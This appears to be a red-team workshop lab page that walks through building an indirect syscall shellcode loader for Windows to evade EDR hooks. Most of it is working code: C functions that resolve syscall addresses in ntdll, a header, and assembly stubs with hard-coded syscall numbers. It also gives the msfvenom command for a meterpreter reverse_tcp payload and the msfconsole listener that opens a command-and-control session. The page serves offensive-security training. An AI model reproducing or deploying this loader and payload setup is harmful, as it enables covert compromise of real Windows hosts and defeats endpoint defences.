-
-
Notifications
You must be signed in to change notification settings - Fork 89
14: Chapter 7 | LAB Exercise Playbook
Related to the Win32-API loader, in this exercise we will make the third modification, creating the indirect syscall loader.
The main difference between the direct syscall loader and the indirect syscall loader is that only part of the syscall stub from a native function is implemented directly into the indirect syscall loader itself. This means that we implement and execute mov r10, rcx
, mov eax, SSN
and jmp qword ptr
in the indirect syscall loader, but unlike the direct syscall loader, we do not execute the syscall
and return
from the indirect syscall loader's memory. Instead, we use an unconditional jump jmp qword ptr
to jump to the syscall
address of the native function in ntdll.dll
and execute the syscall
and return
from the memory location of ntdll.dll
. Why exactly this is an advantage over direct syscalls in terms of EDR evasion is discussed in detail in Chapter 8, where we compare the call stacks of our various shellcode loaders.
The code template for this tutorial can be found here.
Task Nr. | Task Description |
---|---|
1 | Download the indirect syscall loader POC for this chapter. |
2 | Most of the code is already implemented in the POC. However, you have to complete the indirect syscall loader by performing the following tasks:
|
3 | Create a staged x64 meterpreter shellcode with msfvenom, copy it to the POC and compile the POC. |
4 | Create and run a staged x64 meterpreter listener using msfconsole. |
5 | Run your compiled .exe and check that a stable command and control channel opens. |
Task Nr. | Task Description |
---|---|
6 | Use the Visual Studio dumpbin tool to analyse the syscall loader. Are any Win32 APIs being imported from kernel32.dll ? Is the result what you expected? |
7 | Use x64dbg to debug or analyse the loader.
|
You can download the POC from the code section of this chapter. The code works as follows, shellcode declaration is done as before.
// Insert the Meterpreter shellcode as an array of unsigned chars (replace the placeholder with actual shellcode)
unsigned char code[] = "\xfc\x48\x83";
As mentioned at the beginning of this chapter, we want to execute the syscall
and return
statements from the syscall stub of the native functions we are using from the memory of ntdll.dll
. Therefore, we need to jump from the memory of the indirect syscall loader.exe to the syscall
address of the corresponding native function in the memory of ntdll.dll
at the right time. This is done by executing jmp qword ptr
in the indirect syscall loader after mov r10, rcx
and mov eax, SSN
have been executed. To do this using Windows APIs, we need to do the following:
-
Open a handle to
ntdll.dll
at runtime usingGetModuleHandleA
. -
Get the start address of the native function in
ntdll.dll
usingGetProcAddress
and store it in a variable declared as a function pointer. -
Get the memory address of the
syscall
instruction in the syscall stub by adding the required offset and store it in a variable declared as a global variable.
First, we want to use the following code which uses the function GetModuleHandleA
to open a handle to ntdll.dll
at runtime. This code is already implemented in the indirect syscall POC.
Code
// Get a handle to the ntdll.dll library
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
if (hNtdll == NULL) {
// Handle the error, for example, print an error message and return.
printf("Error: the specified module could not be found.");
return 1; // Or any other non-zero value, since typically a zero return indicates success
}
Then we want to use the following code which uses the GetProcAddress
function to get the start address of the respective native function in the memory of ntdll.dll
and store it in a variable declared as a function pointer.
In the indirect syscall POC, this code is implemented only for the native function NtAllocateVirtualMemory
and must be completed by the workshop attendee based on the code scheme for NtAllocateVirtualMemory
which can be seen in the code section below.
Code
// Declare and initialize a pointer to the NtAllocateVirtualMemory function and get the address of the NtAllocateVirtualMemory function in the ntdll.dll module
UINT_PTR pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
If it was not possible for you to complete this code section, you can find the code in the following solution section.
Solution
// Declare and initialize a pointer to the NtAllocateVirtualMemory function and get the address of the NtAllocateVirtualMemory function in the ntdll.dll module
UINT_PTR pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
UINT_PTR pNtWriteVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
UINT_PTR pNtCreateThreadEx = (UINT_PTR)GetProcAddress(hNtdll, "NtCreateThreadEx");
UINT_PTR pNtWaitForSingleObject = (UINT_PTR)GetProcAddress(hNtdll, "NtWaitForSingleObject");
In the next step, we want to get the effective memory address from the syscall
instruction in the syscall stub
of the native function by adding the necessary offset to the start address of the native function that we retrieved in the previous step. To get the memory address from the syscall
instruction, we need to add 12-bytes
. Why exactly 12 bytes? This is the necessary offset calculated from the start address of the native function to get the address of the syscall instruction in the syscall stub.
In the indirect syscall POC, this code is implemented only for the native function NtAllocateVirtualMemory
and must be completed by the workshop attendee based on the code scheme for NtAllocateVirtualMemory
which can be seen in the code section below.
Code
// The syscall stub (actual system call instruction) is some bytes further into the function.
// In this case, it's assumed to be 0x12 (18 in decimal) bytes from the start of the function.
// So we add 0x12 to the function's address to get the address of the system call instruction.
sysAddrNtAllocateVirtualMemory = pNtAllocateVirtualMemory + 0x12;
If it was not possible for you to complete this code section, you can find the code in the following solution section.
Solution
// The syscall stub (actual system call instruction) is some bytes further into the function.
// In this case, it's assumed to be 0x12 (18 in decimal) bytes from the start of the function.
// So we add 0x12 to the function's address to get the address of the system call instruction.
sysAddrNtAllocateVirtualMemory = pNtAllocateVirtualMemory + 0x12;
sysAddrNtWriteVirtualMemory = pNtWriteVirtualMemory + 0x12;
sysAddrNtCreateThreadEx = pNtCreateThreadEx + 0x12;
sysAddrNtWaitForSingleObject = pNtWaitForSingleObject + 0x12;
To store the memory address from the syscall
instruction of the respective native function, and also to be able to provide the memory address later for the assembly code in the syscalls.asm
file, we declare a global variable for each syscall
address, which is declared as a pointer.
Also in this case in the indirect syscall POC, this code is implemented only for the native function NtAllocateVirtualMemory
and must be completed by the workshop attendee based on the code scheme for NtAllocateVirtualMemory
which can be seen in the code section below.
Code
// Declare global variables to hold the syscall instruction addresses
UINT_PTR sysAddrNtAllocateVirtualMemory;
If it was not possible for you to complete this code section, you can find the code in the following solution section.
Solution
// Declare global variables to hold the syscall instruction addresses
UINT_PTR sysAddrNtAllocateVirtualMemory;
UINT_PTR sysAddrNtWriteVirtualMemory;
UINT_PTR sysAddrNtCreateThreadEx;
UINT_PTR sysAddrNtWaitForSingleObject;
Like the direct syscall loader, we no longer ask ntdll.dll
for the function definition of the native APIs we use. But we still want to use the native functions, so we need to define or directly implement the structure for all four native functions in a header file. In this case, the header file should be called syscalls.h
.
The syscalls.h
file does not currently exist in the syscall POC folder, your task is to add a new header file named syscalls.h
and implement the required code. The code for the syscalls.h
file can be found in the code section below. You will also need to include the header syscalls.h
in the main code.
Additional information if you want to check the function definition manually should be available in the Microsoft documentation, e.g. for NtAllocateVirtualMemory.
Details
Code
#ifndef _SYSCALLS_H // If _SYSCALLS_H is not defined then define it and the contents below. This is to prevent double inclusion.
#define _SYSCALLS_H // Define _SYSCALLS_H
#include <windows.h> // Include the Windows API header
// The type NTSTATUS is typically defined in the Windows headers as a long.
typedef long NTSTATUS; // Define NTSTATUS as a long
typedef NTSTATUS* PNTSTATUS; // Define a pointer to NTSTATUS
// Declare the function prototype for NtAllocateVirtualMemory
extern NTSTATUS NtAllocateVirtualMemory(
HANDLE ProcessHandle, // Handle to the process in which to allocate the memory
PVOID* BaseAddress, // Pointer to the base address
ULONG_PTR ZeroBits, // Number of high-order address bits that must be zero in the base address of the section view
PSIZE_T RegionSize, // Pointer to the size of the region
ULONG AllocationType, // Type of allocation
ULONG Protect // Memory protection for the region of pages
);
// Declare the function prototype for NtWriteVirtualMemory
extern NTSTATUS NtWriteVirtualMemory(
HANDLE ProcessHandle, // Handle to the process in which to write the memory
PVOID BaseAddress, // Pointer to the base address
PVOID Buffer, // Buffer containing data to be written
SIZE_T NumberOfBytesToWrite, // Number of bytes to be written
PULONG NumberOfBytesWritten // Pointer to the variable that receives the number of bytes written
);
// Declare the function prototype for NtCreateThreadEx
extern NTSTATUS NtCreateThreadEx(
PHANDLE ThreadHandle, // Pointer to a variable that receives a handle to the new thread
ACCESS_MASK DesiredAccess, // Desired access to the thread
PVOID ObjectAttributes, // Pointer to an OBJECT_ATTRIBUTES structure that specifies the object's attributes
HANDLE ProcessHandle, // Handle to the process in which the thread is to be created
PVOID lpStartAddress, // Pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread
PVOID lpParameter, // Pointer to a variable to be passed to the thread
ULONG Flags, // Flags that control the creation of the thread
SIZE_T StackZeroBits, // A pointer to a variable that specifies the number of high-order address bits that must be zero in the stack pointer
SIZE_T SizeOfStackCommit, // The size of the stack that must be committed at thread creation
SIZE_T SizeOfStackReserve, // The size of the stack that must be reserved at thread creation
PVOID lpBytesBuffer // Pointer to a variable that receives any output data from the system
);
// Declare the function prototype for NtWaitForSingleObject
extern NTSTATUS NtWaitForSingleObject(
HANDLE Handle, // Handle to the object to be waited on
BOOLEAN Alertable, // If set to TRUE, the function returns when the system queues an I/O completion routine or APC for the thread
PLARGE_INTEGER Timeout // Pointer to a LARGE_INTEGER that specifies the absolute or relative time at which the function should return, regardless of the state of the object
);
#endif // _SYSCALLS_H // End of the _SYSCALLS_H definition
As in the direct syscall loader, we do not want to ask ntdll.dll
for the syscall stub or the content or code of the syscall stub (assembly instructions mov r10, rcx
, mov eax, SSN
etc.) of the native functions we use, instead we have to implement the necessary assembly code in the assembly itself. But compared to the direct syscall loader, in the indirect syscall loader we only implement a part of the syscall stub directly. That is, we implement mov r10, rcx
, mov eax, SSN
, but we replace the syscall
instruction with an unconditional jump instruction jmp qword ptr
. This allows us to jump to the memory address of the syscall
instruction in the memory of ntdll.dll
, and the syscall
and return
instructions are executed in the memory of ntdll.dll
.
Also in this case, instead of using a tool to create the necessary assembly instructions, for the best learning experience we will manually implement the assembly code in our indirect syscall POC. To do this, you will find a file called syscalls.asm
in the indirect syscall loader POC directory, which contains some of the required assembler code. Compared to the direct syscall loader POC, in the syscalls.asm
file of the indirect syscall loader POC, we need to be able to call the memory address of the respective syscall. This is necessary to realise the jump in the memory of ntdll.dll
. This is done with the following code for the syscall instructions of NtAllocateVirtualMemory
.
The code below shows the assembler code for the syscall stub of NtAllocateVirtualMemory
which is already implemented in the syscalls.asm
file.
Code
EXTERN sysAddrNtAllocateVirtualMemory:QWORD ; The actual address of the NtAllocateVirtualMemory syscall in ntdll.dll.
.CODE ; Start the code section
; Procedure for the NtAllocateVirtualMemory syscall
NtAllocateVirtualMemory PROC
mov r10, rcx ; Move the contents of rcx to r10. This is necessary because the syscall instruction in 64-bit Windows expects the parameters to be in the r10 and rdx registers.
mov eax, 18h ; Move the syscall number into the eax register.
jmp QWORD PTR [sysAddrNtAllocateVirtualMemory] ; Jump to the actual syscall.
NtAllocateVirtualMemory ENDP ; End of the procedure.
END ; End of the module
It is your task to add the syscalls.asm
file as a resource (existing item) to the indirect syscall loader project and complete the assembler code and C code for the other three missing native APIs NtWriteVirtualMemory
, NtCreateThreadEx
and NtWaitForSingleObject
.
If you are unable to complete the assembly code at this time, you can use the assembly code from the solution and paste it into the syscalls.asm
file in the direct syscall loader POC. Note that the syscalls IDs are for Windows 10 Enterprise 22H2 and may not work for your target. You may need to replace the syscalls IDs with the correct syscalls IDs for your target Windows version.
Solution
EXTERN sysAddrNtAllocateVirtualMemory:QWORD ; The actual address of the NtAllocateVirtualMemory syscall in ntdll.dll.
EXTERN sysAddrNtWriteVirtualMemory:QWORD ; The actual address of the NtWriteVirtualMemory syscall in ntdll.dll.
EXTERN sysAddrNtCreateThreadEx:QWORD ; The actual address of the NtCreateThreadEx syscall in ntdll.dll.
EXTERN sysAddrNtWaitForSingleObject:QWORD ; The actual address of the NtWaitForSingleObject syscall in ntdll.dll.
.CODE ; Start the code section
; Procedure for the NtAllocateVirtualMemory syscall
NtAllocateVirtualMemory PROC
mov r10, rcx ; Move the contents of rcx to r10. This is necessary because the syscall instruction in 64-bit Windows expects the parameters to be in the r10 and rdx registers.
mov eax, 18h ; Move the syscall number into the eax register.
jmp QWORD PTR [sysAddrNtAllocateVirtualMemory] ; Jump to the actual syscall.
NtAllocateVirtualMemory ENDP ; End of the procedure.
; Similar procedures for NtWriteVirtualMemory syscalls
NtWriteVirtualMemory PROC
mov r10, rcx
mov eax, 3Ah
jmp QWORD PTR [sysAddrNtWriteVirtualMemory]
NtWriteVirtualMemory ENDP
; Similar procedures for NtCreateThreadEx syscalls
NtCreateThreadEx PROC
mov r10, rcx
mov eax, 0C2h
jmp QWORD PTR [sysAddrNtCreateThreadEx]
NtCreateThreadEx ENDP
; Similar procedures for NtWaitForSingleObject syscalls
NtWaitForSingleObject PROC
mov r10, rcx
mov eax, 4
jmp QWORD PTR [sysAddrNtWaitForSingleObject]
NtWaitForSingleObject ENDP
END ; End of the module
We have already implemented all the necessary assembler code in the syscalls.asm
file. But in order for the code to be interpreted correctly within the direct syscall POC, we need to do a few things. These steps are not done in the downloadable POC and must be done manually.
First, we need to enable support for Microsoft Macro Assembler (MASM) in the Visual Studio project by enabling the option in Build Dependencies/Build Customisations.
Details
We also need to set the item type of the syscalls.asm
file to Microsoft Macro Assembler, otherwise we will get an unresolved symbol error in the context of the native APIs used in the direct syscall loader. We also set "Excluded from Build" to no and "Content" to yes.
Details
Again, we will create our meterpreter shellcode with msfvenom in Kali Linux. To do this, we will use the following command and create x64 staged meterpreter shellcode.
kali>
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IPv4_Redirector_or_IPv4_Kali LPORT=80 -f c > /tmp/shellcode.txt
The shellcode can then be copied into the direct syscall loader POC by replacing the placeholder at the unsigned char, and the POC can be compiled as an x64 release.
Before we test the functionality of our direct syscall loader, we need to create a listener within msfconsole.
kali>
msfconsole
msf>
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost IPv4_Redirector_or_IPv4_Kali
set lport 80
set exitonsession false
run
Once the listener has been successfully started, you can run your compiled direct syscall loader. If all goes well, you should see an incoming command and control session.
The Visual Studio tool dumpbin can be used to check which Windows APIs are imported via kernel32.dll
. The following command can be used to check the imports. Which results do you expect?
cmd>
cd C:\Program Files (x86)\Microsoft Visual Studio\2019\Community
dumpbin /imports Path/to/Direct_Syscall_Dropper.exe
Results
No imports from the Windows APIs VirtualAlloc
, WriteProcessMemory
, CreateThread
, and WaitForSingleObject
from kernel32.dll
. This was expected and is correct.
The first step is to run your direct syscall loader, check that the .exe is running and that a stable meterpreter C2 channel is open. Then we open x64dbg and attach to the running process, note that if you open the indirect syscall loader directly in x64dbg, you need to run the assembly first.
Then we want to check which APIs (Win32 or Native) are being imported and from which module or memory location. Remember that in the indirect syscall loader we no longer use Win32 APIs in the code and have implemented the structure for the native functions directly in the assembly. What results do you expect?
Results
Checking the imported symbols in our indirect syscall loader, we should again see that the Win32 APIs VirtualAlloc
, WriteProcessMemory
, CreateThread
and WaitForSingleObject
are no longer imported by kernel32.dll
, or are no longer imported in general. So the result is the same as with dumpbin and seems to be valid.
Also, looking at the imported symbols (symbols register), we see that instead of asking ntdll.dll
for the code of the four required native functions NtAllocateVirutalMemory
, NtWriteVirtualMemory
, NtCreateThreadEx
and NtWaitForSingleObject
, these native functions are implemented directly in the .text
region of the shellcode loader.
We use the "Follow in Disassembler" function to analyse the indirect syscall loader to identify the lines of code where the calls to the native functions are made.
We also want to identify the disassembled lines of code where GetModuleHandleA
is used to open a handle to ntdll.dll
and GetProcAdress
is used to get the start address from the native function. We also want to identify the disassembled code where the address is calculated from the respective syscall by adding 12 bytes
as an offset to the start address.
Results
We can identify the lines of code used to open a handle to ntdll.dll
using GetModuleHandleA
, then get the start address of the native functions using GetProcAdress
, and finally calculate the address of the syscall
instruction by adding 12 bytes
as an offset to the start address of the respective native function.
Also in the case of the indirect syscall loader we want to check in which module the syscall stub or the assembler instructions of the native functions are implemented and executed. Remember, unlike the direct syscall loader from the previous chapter, in the indirect syscall loader POC we have only implemented part of the syscall stub directly into the loader itself. What results do you expect?
Results
For example, in the context of the native function NtAllocateVirtualMemory
, we use the "Follow in Disassembler" function and should be able to see that the syscall stub is not fetched from
ntdll.dll, but in the case of the indirect syscall loader, only part of the assembly instructions are implemented directly into the .text
section of the assembly. Furthermore, we can see that the unconditional jump to the memory of ntdll.dll
is done via jmp qword ptr
and that the syscall
statement and the return
statement are executed from the memory location of ntdll.dll
.
- Made transition from direct syscalls to indirect syscalls
- Loader imports no longer Windows APIs from
kernel32.dll
- Loader imports no longer Native APIs from
ntdll.dll
- Only a part of the syscall stub is directly implemented into
.text
section of the shellcode loader - The
syscall
andreturn
statements are executed from the memory of thentdll.dll
. - User mode hooks in
ntdll.dll
and EDR can be bypassed - EDR detection based on checking the
syscall
andreturn
address in the call stack can be bypassed.
- System Service Numbers (SSNs) are hard-coded into the POC.
- If one or more of the Native APIs used are hooked by the EDR, depending on the EDR, the execution of the shellcode is likely to fail.
- If an EDR uses Event Tracing for Windows (ETW) or Event Tracing for Windows Threat Intelligence (EtwTi) to check the entire call stack, rather than just the memory area from which the syscall was executed and/or the return address, then indirect syscalls are likely to fail.